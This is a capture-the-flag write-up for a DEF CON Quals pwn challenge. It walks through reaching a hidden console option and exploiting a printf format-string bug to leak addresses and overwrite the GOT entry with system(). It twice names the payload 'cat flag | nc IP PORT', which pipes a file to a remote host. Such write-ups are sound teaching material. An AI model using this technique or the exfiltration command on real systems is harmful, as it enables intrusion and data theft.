wibbly wobbly timey wimey

DEFCON QUALS CTF PWN Challenge: 2pts

Challenge Description:

"Don't blink!"
The challenge binary was a game that had to be solved multiple times in order to reach the special "TARDIS CONSOLE". Once you made it this far, you could work your way, in the console, towards a printf() that was passed user specified coordinates. Using this, a format string vulnerability could be exploited to get a shell.



Find a way to exploit the format string vulnerability, leak text and libc addresses then execute user input as bash commands.
(Python script to get system("cat flag| nc <..IP..> <..PORT..>") executed on the server and the binary of the server to pwn linked at the bottom.)

            1) Write a python script to repeatedly solve the game for you.

            2) Enter in the special key "UeSlhCAGEp"- this can be found through reversing the binary to see what your input is being compared to.

            3) This gets you to the TARDIS CONSOLE where all the interesting stuff is.

            4) Looking closer at the binary, we realize that a special option of the console will get us to the format string vuln. Now we need to get there.

            5) Opening it again at IDA, we realize that when choosing a console option (between a 1 or a 2), 8 bytes is accepted but only 1 is used.

            6) Use this to get to the hidden option (3) containing the "printf()".

            7) Once we get to the printf, we can pretty much do whatever we want, as it takes user input directly!

            8) First we leak text, then libc addresses to calculate the address of "system()" use to overwrite the "printf()" in the GOT.

            9) Calling the 3rd option again with our coordinates, we pass the payload (cat flag | nc IP PORT) to "printf()" which is now really "system()".

            10) Listen on an open port using netcat, and get the flag!

Detailed steps to flag:


Binaries & Scripts: